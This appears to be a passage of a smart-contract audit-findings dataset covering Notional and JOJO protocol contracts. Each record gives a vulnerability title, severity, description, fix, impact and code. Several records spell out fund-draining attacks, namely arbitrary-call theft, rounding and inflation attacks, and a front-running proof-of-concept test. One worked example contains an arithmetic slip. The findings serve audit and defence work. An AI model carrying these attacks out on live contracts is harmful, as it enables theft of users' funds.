targets\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy); \\n```\\n -Rebalance might be skipped even if the external lending is unhealthyчmediumчThe deviation between the target and current lending amount (offTargetPercentage) will be underestimated due to incorrect calculation. As a result, a rebalancing might be skipped even if the existing external lending is unhealthy.\\nThe formula used within the `_isExternalLendingUnhealthy` function below calculating the `offTargetPercentage` can be simplified as follows for the readability of this issue.\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{currentExternalUnderlyingLend + targetAmount} \\times 100% $$\\nAssume that the `targetAmount` is 100 and `currentExternalUnderlyingLend` is 90. The off-target percentage will be 5.26%, which is incorrect.\\n```\\noffTargetPercentage = abs(90 - 100) / (100 + 90) = 10 / 190 = 0.0526 = 5.26%\\n```\\n\\nThe correct approach is to calculate the off-target percentages as a ratio of the difference to the target:\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{targetAmount} \\times 100% $$\\n```\\noffTargetPercentage = abs(90 - 100) / (100) = 10 / 100 = 0.0526 = 10%\\n```\\n\\n```\\nFile: TreasuryAction.sol\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n oracleData = oracle.getOracleData(); \\n\\n RebalancingTargetData memory rebalancingTargetData =\\n LibStorage.getRebalancingTargets()[currencyId][oracleData.holding]; \\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId); \\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId); \\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n ); \\n\\n if (oracleData.currentExternalUnderlyingLend == 0) { \\n // If this is zero then there is no outstanding lending.\\n isExternalLendingUnhealthy = false; \\n } else {\\n uint256 offTargetPercentage = oracleData.currentExternalUnderlyingLend.toInt() \\n .sub(targetAmount.toInt()).abs()\\n .toUint()\\n .mul(uint256(Constants.PERCENTAGE_DECIMALS))\\n .div(targetAmount.add(oracleData.currentExternalUnderlyingLend)); \\n \\n // prevent rebalance if change is not greater than 1%, important for health check and avoiding triggering\\n // rebalance shortly after rebalance on minimum change\\n isExternalLendingUnhealthy = \\n (targetAmount < oracleData.currentExternalUnderlyingLend) && (offTargetPercentage > 0); \\n }\\n }\\n```\\nчConsider calculating the off-target percentages as a ratio of the difference to the target:\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{targetAmount} \\times 100% $$чThe deviation between the target and current lending amount (offTargetPercentage) will be underestimated by approximately half the majority of the time. As a result, a rebalance intended to remediate the unhealthy external lending might be skipped since the code incorrectly assumes that it has not hit the off-target percentage. External lending beyond the target will affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation, having issues executed due to insufficient liquidity.ч```\\noffTargetPercentage = abs(90 - 100) / (100 + 90) = 10 / 190 = 0.0526 = 5.26%\\n```\\n -All funds can be stolen from JOJODealerчhighч`Funding._withdraw()` makes arbitrary call with user specified params. User can for example make ERC20 to himself and steal funds.\\nUser can specify parameters `param` and `to` when withdraws:\\n```\\n function executeWithdraw(address from, address to, bool isInternal, bytes memory param) external nonReentrant {\\n Funding.executeWithdraw(state, from, to, isInternal, param);\\n }\\n```\\n\\nIn the end of `_withdraw()` function address `to` is called with that bytes param:\\n```\\n function _withdraw(\\n Types.State storage state,\\n address spender,\\n address from,\\n address to,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isInternal,\\n bytes memory param\\n )\\n private\\n {\\n // rest of code\\n\\n if (param.length != 0) {\\n require(Address.isContract(to), \"target is not a contract\");\\n (bool success,) = to.call(param);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n }\\n }\\n```\\n\\nAs an attack vector attacker can execute withdrawal of 1 wei to USDC contract and pass calldata to transfer arbitrary USDC amount to himself via USDC contract.чDon't make arbitrary call with user specified paramsчAll funds can be stolen from JOJODealerч```\\n function executeWithdraw(address from, address to, bool isInternal, bytes memory param) external nonReentrant {\\n Funding.executeWithdraw(state, from, to, isInternal, param);\\n }\\n```\\n -FundingRateArbitrage contract can be drained due to rounding errorчhighчIn the `requestWithdraw`, rounding in the wrong direction is done which can lead to contract being drained.\\nIn the `requestWithdraw` function in `FundingRateArbitrage`, we find the following lines of code:\\n```\\njusdOutside[msg.sender] -= repayJUSDAmount;\\nuint256 index = getIndex();\\nuint256 lockedEarnUSDCAmount = jusdOutside[msg.sender].decimalDiv(index);\\nrequire(\\n earnUSDCBalance[msg.sender] >= lockedEarnUSDCAmount, \"lockedEarnUSDCAmount is bigger than earnUSDCBalance\"\\n);\\nwithdrawEarnUSDCAmount = earnUSDCBalance[msg.sender] - lockedEarnUSDCAmount;\\n```\\n\\nBecause we round down when calculating `lockedEarnUSDCAmount`, `withdrawEarnUSDCAmount` is higher than it should be, which leads to us allowing the user to withdraw more than we should allow them to given the amount of JUSD they repaid.\\nThe execution of this is a bit more complicated, let's go through an example. We will assume there's a bunch of JUSD existing in the contract and the attacker is the first to deposit.\\nSteps:\\nThe attacker deposits `1` unit of USDC and then manually sends in another 100 * 10^6 - `1` (not through deposit, just a transfer). The share price / price per earnUSDC will now be $100. Exactly one earnUSDC is in existence at the moment.\\nNext the attacker creates a new EOA and deposits a little over $101 worth of USDC (so that after fees we can get to the $100), giving one earnUSDC to the EOA. The attacker will receive around $100 worth of `JUSD` from doing this.\\nAttacker calls `requestWithdraw` with `repayJUSDAmount` = `1` with the second newly created EOA\\n`lockedEarnUSDCAmount` is rounded down to 0 (since `repayJUSDAmount` is subtracted from jusdOutside[msg.sender]\\n`withdrawEarnUSDCAmount` will be `1`\\nAfter `permitWithdrawRequests` is called, attacker will be able to withdraw the $100 they deposited through the second EOA (granted, they lost the deposit and withdrawal fees) while only having sent `1` unit of `JUSD` back. This leads to massive profit for the attacker.\\nAttacker can repeat steps 2-6 constantly until the contract is drained of JUSD.чRound up instead of downчAll JUSD in the contract can be drainedч```\\njusdOutside[msg.sender] -= repayJUSDAmount;\\nuint256 index = getIndex();\\nuint256 lockedEarnUSDCAmount = jusdOutside[msg.sender].decimalDiv(index);\\nrequire(\\n earnUSDCBalance[msg.sender] >= lockedEarnUSDCAmount, \"lockedEarnUSDCAmount is bigger than earnUSDCBalance\"\\n);\\nwithdrawEarnUSDCAmount = earnUSDCBalance[msg.sender] - lockedEarnUSDCAmount;\\n```\\n -`JUSDBankStorage::getTRate()`,`JUSDBankStorage::accrueRate()` are calculated differently, and the data calculation is biased, Causes the `JUSDBank` contract funciton result to be incorrectчmediumч```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR + 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return tRate + (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n }\\n```\\n\\nJUSDBankStorage::getTRate(),JUSDBankStorage::accrueRate() are calculated differently, and the data calculation is biased, resulting in the JUSDBank contract not being executed correctly\\nThe wrong result causes the funciton calculation results of `JUSDBank::_isAccountSafe()`, `JUSDBank::flashLoan()`, `JUSDBank::_handleBadDebt`, etc. to be biased,and all functions that call the relevant function will be biasedчUse the same calculation formula:\\n```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp // Remove the line below\\n uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR // Add the line below\\n 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp // Remove the line below\\n uint256(lastUpdateTimestamp);\\n// Remove the line below\\n return tRate // Add the line below\\n (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n// Add the line below\\n return tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR // Add the line below\\n 1e18);\\n }\\n```\\nчCauses the `JUSDBank` contract funciton result to be incorrectч```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR + 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return tRate + (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n }\\n```\\n -Funding#requestWithdraw uses incorrect withdraw addressчmediumчWhen requesting a withdraw, `msg.sender` is used in place of the `from` address. This means that withdraws cannot be initiated on behalf of other users. This will break integrations that depend on this functionality leading to irretrievable funds.\\nFunding.sol#L69-L82\\n```\\nfunction requestWithdraw(\\n Types.State storage state,\\n address from,\\n uint256 primaryAmount,\\n uint256 secondaryAmount\\n)\\n external\\n{\\n require(isWithdrawValid(state, msg.sender, from, primaryAmount, secondaryAmount), Errors.WITHDRAW_INVALID);\\n state.pendingPrimaryWithdraw[msg.sender] = primaryAmount;\\n state.pendingSecondaryWithdraw[msg.sender] = secondaryAmount;\\n state.withdrawExecutionTimestamp[msg.sender] = block.timestamp + state.withdrawTimeLock;\\n emit RequestWithdraw(msg.sender, primaryAmount, secondaryAmount, state.withdrawExecutionTimestamp[msg.sender]);\\n}\\n```\\n\\nAs shown above the withdraw is accidentally queue to `msg.sender` NOT the `from` address. This means that all withdraws started on behalf of another user will actually trigger a withdraw `from` the `operator`. The result is that withdraw cannot be initiated on behalf of other users, even if the allowance is set properly, leading to irretrievable fundsчChange all occurrences of `msg.sender` in stage changes to `from` instead.чRequesting withdraws for other users is broken and strands fundsч```\\nfunction requestWithdraw(\\n Types.State storage state,\\n address from,\\n uint256 primaryAmount,\\n uint256 secondaryAmount\\n)\\n external\\n{\\n require(isWithdrawValid(state, msg.sender, from, primaryAmount, secondaryAmount), Errors.WITHDRAW_INVALID);\\n state.pendingPrimaryWithdraw[msg.sender] = primaryAmount;\\n state.pendingSecondaryWithdraw[msg.sender] = secondaryAmount;\\n state.withdrawExecutionTimestamp[msg.sender] = block.timestamp + state.withdrawTimeLock;\\n emit RequestWithdraw(msg.sender, primaryAmount, secondaryAmount, state.withdrawExecutionTimestamp[msg.sender]);\\n}\\n```\\n -FundRateArbitrage is vulnerable to inflation attacksчmediumчWhen index is calculated, it is figured by dividing the net value of the contract (including USDC held) by the current supply of earnUSDC. Through deposit and donation this ratio can be inflated. Then when others deposit, their deposit can be taken almost completely via rounding.\\nFundingRateArbitrage.sol#L98-L104\\n```\\nfunction getIndex() public view returns (uint256) {\\n if (totalEarnUSDCBalance == 0) {\\n return 1e18;\\n } else {\\n return SignedDecimalMath.decimalDiv(getNetValue(), totalEarnUSDCBalance);\\n }\\n}\\n```\\n\\nIndex is calculated is by dividing the net value of the contract (including USDC held) by the current supply of totalEarnUSDCBalance. This can be inflated via donation. Assume the user deposits 1 share then donates 100,000e6 USDC. The exchange ratio is now 100,000e18 which causes issues during deposits.\\nFundingRateArbitrage.sol#L258-L275\\n```\\nfunction deposit(uint256 amount) external {\\n require(amount != 0, \"deposit amount is zero\");\\n uint256 feeAmount = amount.decimalMul(depositFeeRate);\\n if (feeAmount > 0) {\\n amount -= feeAmount;\\n IERC20(usdc).transferFrom(msg.sender, owner(), feeAmount);\\n }\\n uint256 earnUSDCAmount = amount.decimalDiv(getIndex());\\n IERC20(usdc).transferFrom(msg.sender, address(this), amount);\\n JOJODealer(jojoDealer).deposit(0, amount, msg.sender);\\n earnUSDCBalance[msg.sender] += earnUSDCAmount;\\n jusdOutside[msg.sender] += amount;\\n totalEarnUSDCBalance += earnUSDCAmount;\\n require(getNetValue() <= maxNetValue, \"net value exceed limitation\");\\n uint256 quota = maxUsdcQuota[msg.sender] == 0 ? defaultUsdcQuota : maxUsdcQuota[msg.sender];\\n require(earnUSDCBalance[msg.sender].decimalMul(getIndex()) <= quota, \"usdc amount bigger than quota\");\\n emit DepositToHedging(msg.sender, amount, feeAmount, earnUSDCAmount);\\n}\\n```\\n\\nNotice earnUSDCAmount is amount / index. With the inflated index that would mean that any deposit under 100,000e6 will get zero shares, making it exactly like the standard ERC4626 inflation attack.чUse a virtual offset as suggested by OZ for their ERC4626 contractsчSubsequent user deposits can be stolenч```\\nfunction getIndex() public view returns (uint256) {\\n if (totalEarnUSDCBalance == 0) {\\n return 1e18;\\n } else {\\n return SignedDecimalMath.decimalDiv(getNetValue(), totalEarnUSDCBalance);\\n }\\n}\\n```\\n -Lender transactions can be front-run, leading to lost fundsчhighчUsers can mint wfCash tokens via `mintViaUnderlying` by passing a variable `minImpliedRate` to guard against trade slippage. If the market interest is lower than expected by the user, the transaction will revert due to slippage protection. However, if the user mints a share larger than maxFCash, the `minImpliedRate` check is not performed.\\n```\\n function mintViaUnderlying(\\n uint256 depositAmountExternal,\\n uint88 fCashAmount,\\n address receiver,\\n uint32 minImpliedRate//@audit when lendAmount bigger than maxFCash lack of minRate protect.\\n ) external override {\\n (/* */, uint256 maxFCash) = getTotalFCashAvailable();\\n _mintInternal(depositAmountExternal, fCashAmount, receiver, minImpliedRate, maxFCash);\\n }\\n```\\n\\n```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);//@audit-info fCashAmount * (underlyingTokenDecimals) / 1e8\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);//@audit check this.\\n } \\n```\\n\\nImagine the following scenario:\\nlender deposit Underlying token to `mint` some shares and set a `minImpliedRate` to protect the trsanction\\nalice front-run her transaction invoke `mint` to `mint` some share\\nthe shares of lender `mint` now is bigger than `maxFCash`\\nnow the lender `lending at zero`\\n```\\n function testDepositViaUnderlying() public {\\n address alice = makeAddr(\"alice\");\\n deal(address(asset), LENDER, 8800 * precision, true);\\n deal(address(asset), alice, 5000 * precision, true);\\n\\n //alice deal.\\n vm.stopPrank();\\n vm.startPrank(alice);\\n asset.approve(address(w), type(uint256).max);\\n \\n //==============================LENDER START=============================//\\n vm.stopPrank();\\n vm.startPrank(LENDER);\\n asset.approve(address(w), type(uint256).max);\\n //user DAI balance before:\\n assertEq(asset.balanceOf(LENDER), 8800e18);\\n\\n (/* */, uint256 maxFCash) = w.getTotalFCashAvailable();\\n console2.log(\"current maxFCash:\",maxFCash);\\n\\n //LENDER mintViaUnderlying will revert due to slippage.\\n uint32 minImpliedRate = 0.15e9;\\n vm.expectRevert(\"Trade failed, slippage\");\\n w.mintViaUnderlying(5000e18,5000e8,LENDER,minImpliedRate);\\n //==============================LENDER END=============================//\\n\\n //======================alice frontrun to mint some shares.============//\\n vm.stopPrank();\\n vm.startPrank(alice);\\n w.mint(5000e8,alice);\\n\\n //==========================LENDER TX =================================//\\n vm.stopPrank();\\n vm.startPrank(LENDER);\\n asset.approve(address(w), type(uint256).max);\\n //user DAI balance before:\\n assertEq(asset.balanceOf(LENDER), 8800e18);\\n\\n //LENDER mintViaUnderlying will success.\\n w.mintViaUnderlying(5000e18,5000e8,LENDER,minImpliedRate);\\n\\n console2.log(\"lender mint token:\",w.balanceOf(LENDER));\\n console2.log(\"lender cost DAI:\",8800e18 - asset.balanceOf(LENDER));\\n }\\n```\\n\\nFrom the above test, we can observe that if `maxFCasha` is greater than `5000e8`, the lender's transaction will be reverted due to \"Trade failed, slippage.\" Subsequently, if Alice front-runs by invoking `mint` to create some shares before the lender, the lender's transaction will succeed. Therefore, the lender's `minImpliedRate` check will be bypassed, leading to a loss of funds for the lender.чadd a check inside `_mintInternal`\\n```\\n if (maxFCash < fCashAmount) {\\n// Add the line below\\n require(minImpliedRate ==0,\"Trade failed, slippage\"); \\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);//@audit-info fCashAmount * (underlyingTokenDecimals) / 1e8\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);//@audit check this.\\n }\\n```\\nчlender lost of fundsч```\\n function mintViaUnderlying(\\n uint256 depositAmountExternal,\\n uint88 fCashAmount,\\n address receiver,\\n uint32 minImpliedRate//@audit when lendAmount bigger than maxFCash lack of minRate protect.\\n ) external override {\\n (/* */, uint256 maxFCash) = getTotalFCashAvailable();\\n _mintInternal(depositAmountExternal, fCashAmount, receiver, minImpliedRate, maxFCash);\\n }\\n```\\n -Residual ETH will not be sent back to users during the minting of wfCashчhighчResidual ETH will not be sent back to users, resulting in a loss of assets.\\nAt Line 67, residual ETH within the `depositUnderlyingToken` function will be sent as Native ETH back to the `msg.sender`, which is this wfCash Wrapper contract.\\n```\\nFile: wfCashLogic.sol\\n function _mintInternal(\\n..SNIP..\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION); \\n require(fCashAmountExternal <= depositAmountExternal); \\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n..SNIP..\\n // Residual tokens will be sent back to msg.sender, not the receiver. The msg.sender\\n // was used to transfer tokens in and these are any residual tokens left that were not\\n // lent out. Sending these tokens back to the receiver risks them getting locked on a\\n // contract that does not have the capability to transfer them off\\n _sendTokensToReceiver(token, msg.sender, isETH, balanceBefore);\\n```\\n\\nWithin the `depositUnderlyingToken` function Line 108 below, the `returnExcessWrapped` parameter is set to `false`, which means it will not wrap the residual ETH, and that Native ETH will be sent back to the caller (wrapper contract)\\n```\\nFile: AccountAction.sol\\n function depositUnderlyingToken(\\n address account,\\n uint16 currencyId,\\n uint256 amountExternalPrecision\\n ) external payable nonReentrant returns (uint256) {\\n..SNIP..\\nFile: AccountAction.sol\\n int256 primeCashReceived = balanceState.depositUnderlyingToken(\\n msg.sender,\\n SafeInt256.toInt(amountExternalPrecision),\\n false // there should never be excess ETH here by definition\\n );\\n```\\n\\nbalanceBefore = amount of WETH before the deposit, balanceAfter = amount of WETH after the deposit.\\nWhen the `_sendTokensToReceiver` is executed, these two values are going to be the same since it is Native ETH that is sent to the wrapper instead of WETH. As a result, the Native ETH that the wrapper received is not forwarded to the users.\\n```\\nFile: wfCashLogic.sol\\n function _sendTokensToReceiver( \\n IERC20 token,\\n address receiver,\\n bool isETH,\\n uint256 balanceBefore\\n ) private returns (uint256 tokensTransferred) {\\n uint256 balanceAfter = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n tokensTransferred = balanceAfter - balanceBefore; \\n\\n if (isETH) {\\n // No need to use safeTransfer for WETH since it is known to be compatible\\n IERC20(address(WETH)).transfer(receiver, tokensTransferred); \\n } else if (tokensTransferred > 0) { \\n token.safeTransfer(receiver, tokensTransferred); \\n }\\n }\\n```\\nчIf the underlying is ETH, measure the Native ETH balance before and after the `depositUnderlyingToken` is executed. Forward any residual Native ETH to the users, if any.чLoss of assets as the residual ETH is not sent to the users.ч```\\nFile: wfCashLogic.sol\\n function _mintInternal(\\n..SNIP..\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION); \\n require(fCashAmountExternal <= depositAmountExternal); \\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n..SNIP..\\n // Residual tokens will be sent back to msg.sender, not the receiver. The msg.sender\\n // was used to transfer tokens in and these are any residual tokens left that were not\\n // lent out. Sending these tokens back to the receiver risks them getting locked on a\\n // contract that does not have the capability to transfer them off\\n _sendTokensToReceiver(token, msg.sender, isETH, balanceBefore);\\n```\\n -Residual ETH not sent back when `batchBalanceAndTradeAction` executedчhighчResidual ETH was not sent back when `batchBalanceAndTradeAction` function was executed, resulting in a loss of assets.\\nPer the comment at Line 122 below, when there is residual ETH, native ETH will be sent from Notional V3 to the wrapper contract. In addition, per the comment at Line 109, it is often the case to have an excess amount to be refunded to the users.\\n```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\nFile: wfCashLogic.sol\\n // If deposit amount external is in excess of the cost to purchase fCash amount (often the case),\\n // then we need to return the difference between postTradeCash - preTradeCash. This is done because\\n // the encoded trade does not automatically withdraw the entire cash balance in case the wrapper\\n // is holding a cash balance.\\n uint256 preTradeCash = getCashBalance();\\n\\n BalanceActionWithTrades[] memory action = EncodeDecode.encodeLegacyLendTrade(\\n currencyId,\\n getMarketIndex(),\\n depositAmountExternal,\\n fCashAmount,\\n minImpliedRate\\n );\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n NotionalV2.batchBalanceAndTradeAction{value: msgValue}(address(this), action); \\n\\n uint256 postTradeCash = getCashBalance(); \\n\\n if (preTradeCash != postTradeCash) { \\n // If ETH, then redeem to WETH (redeemToUnderlying == false)\\n NotionalV2.withdraw(currencyId, _safeUint88(postTradeCash - preTradeCash), !isETH);\\n }\\n }\\n```\\n\\nThis is due to how the `depositUnderlyingExternal` function within Notional V3 is implemented. The `batchBalanceAndTradeAction` will trigger the `depositUnderlyingExternal` function. Within the `depositUnderlyingExternal` function at Line 196, excess ETH will be transferred back to the account (wrapper address) in Native ETH term.\\nNote that for other ERC20 tokens, such as DAI or USDC, the excess will be added to the wrapper's cash balance, and this issue will not occur.\\n```\\nFile: TokenHandler.sol\\n function depositUnderlyingExternal(\\n address account,\\n uint16 currencyId,\\n int256 _underlyingExternalDeposit,\\n PrimeRate memory primeRate,\\n bool returnNativeTokenWrapped\\n ) internal returns (int256 actualTransferExternal, int256 netPrimeSupplyChange) {\\n uint256 underlyingExternalDeposit = _underlyingExternalDeposit.toUint();\\n if (underlyingExternalDeposit == 0) return (0, 0);\\n\\n Token memory underlying = getUnderlyingToken(currencyId);\\n if (underlying.tokenType == TokenType.Ether) {\\n // Underflow checked above\\n if (underlyingExternalDeposit < msg.value) {\\n // Transfer any excess ETH back to the account\\n GenericToken.transferNativeTokenOut(\\n account, msg.value - underlyingExternalDeposit, returnNativeTokenWrapped\\n );\\n } else {\\n require(underlyingExternalDeposit == msg.value, \"ETH Balance\");\\n }\\n\\n actualTransferExternal = _underlyingExternalDeposit;\\n```\\n\\nIn the comment, it mentioned that any residual ETH in native token will be wrapped back to WETH by the `_sendTokensToReceiver`.\\n```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\n..SNIP..\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n```\\n\\nHowever, the current implementation of the `_sendTokensToReceiver`, as shown below, does not wrap the Native ETH to WETH. Thus, the residual ETH will not be sent back to the users and stuck in the contract.\\n```\\nFile: wfCashLogic.sol\\n function _sendTokensToReceiver( \\n IERC20 token,\\n address receiver,\\n bool isETH,\\n uint256 balanceBefore\\n ) private returns (uint256 tokensTransferred) {\\n uint256 balanceAfter = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n tokensTransferred = balanceAfter - balanceBefore; \\n\\n if (isETH) {\\n // No need to use safeTransfer for WETH since it is known to be compatible\\n IERC20(address(WETH)).transfer(receiver, tokensTransferred); \\n } else if (tokensTransferred > 0) { \\n token.safeTransfer(receiver, tokensTransferred); \\n }\\n }\\n```\\nчIf the underlying is ETH, measure the Native ETH balance before and after the `batchBalanceAndTradeAction` is executed. Forward any residual Native ETH to the users, if any.чLoss of assets as the residual ETH is not sent to the users.ч```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\nFile: wfCashLogic.sol\\n // If deposit amount external is in excess of the cost to purchase fCash amount (often the case),\\n // then we need to return the difference between postTradeCash - preTradeCash. This is done because\\n // the encoded trade does not automatically withdraw the entire cash balance in case the wrapper\\n // is holding a cash balance.\\n uint256 preTradeCash = getCashBalance();\\n\\n BalanceActionWithTrades[] memory action = EncodeDecode.encodeLegacyLendTrade(\\n currencyId,\\n getMarketIndex(),\\n depositAmountExternal,\\n fCashAmount,\\n minImpliedRate\\n );\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n NotionalV2.batchBalanceAndTradeAction{value: msgValue}(address(this), action); \\n\\n uint256 postTradeCash = getCashBalance(); \\n\\n if (preTradeCash != postTradeCash) { \\n // If ETH, then redeem to WETH (redeemToUnderlying == false)\\n NotionalV2.withdraw(currencyId, _safeUint88(postTradeCash - preTradeCash), !isETH);\\n }\\n }\\n```\\n -_isExternalLendingUnhealthy() using stale factorsчmediumчIn `checkRebalance()` -> _isExternalLendingUnhealthy() -> getTargetExternalLendingAmount(factors) using stale `factors` will lead to inaccurate `targetAmount`, which in turn will cause `checkRebalance()` that should have been rebalance to not execute.\\nrebalancingBot uses `checkRebalance()` to return the `currencyIds []` that need to be `rebalance`.\\ncall order : `checkRebalance()` -> `_isExternalLendingUnhealthy()` -> `ExternalLending.getTargetExternalLendingAmount(factors)`\\n```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n\\nA very important logic is to get `targetAmount`. The calculation of this value depends on `factors`. But currently used is PrimeCashFactors memory `factors` = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);. This is not the latest. It has not been aggregated yet. The correct one should be `( /* */,factors) = PrimeCashExchangeRate.getPrimeCashRateView();`.ч```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n// Remove the line below\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n// Add the line below\\n ( /* */,PrimeCashFactors memory factors) = PrimeCashExchangeRate.getPrimeCashRateView();\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\nчDue to the incorrect `targetAmount`, it may cause the `currencyId` that should have been re-executed `Rebalance` to not execute `rebalance`, increasing the risk of the protocol.ч```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n -recover() using the standard transfer may not be able to retrieve some tokensчmediumчin `SecondaryRewarder.recover()` Using the standard `IERC20.transfer()` If `REWARD_TOKEN` is like `USDT`, it will not be able to transfer out, because this kind of `token` does not return `bool` This will cause it to always `revert`\\n`SecondaryRewarder.recover()` use for\\nAllows the Notional owner to recover any tokens sent to the address or any reward tokens remaining on the contract in excess of the total rewards emitted.\\n```\\n function recover(address token, uint256 amount) external onlyOwner {\\n if (Constants.ETH_ADDRESS == token) {\\n (bool status,) = msg.sender.call{value: amount}(\"\");\\n require(status);\\n } else {\\n IERC20(token).transfer(msg.sender, amount);\\n }\\n }\\n```\\n\\nUsing the standard `IERC20.transfer()` method to execute the transfer A `token` of a type similar to `USDT` has no return value This will cause the execution of the transfer to always failч```\\n function recover(address token, uint256 amount) external onlyOwner {\\n if (Constants.ETH_ADDRESS == token) {\\n (bool status,) = msg.sender.call{value: amount}(\"\");\\n require(status);\\n } else {\\n// Remove the line below\\n IERC20(token).transfer(msg.sender, amount);\\n// Add the line below\\n GenericToken.safeTransferOut(token,msg.sender,amount);\\n }\\n }\\n```\\nчIf `REWARD_TOKEN` is like `USDT`, it will not be able to transfer out.ч```\\n function recover(address token, uint256 amount) 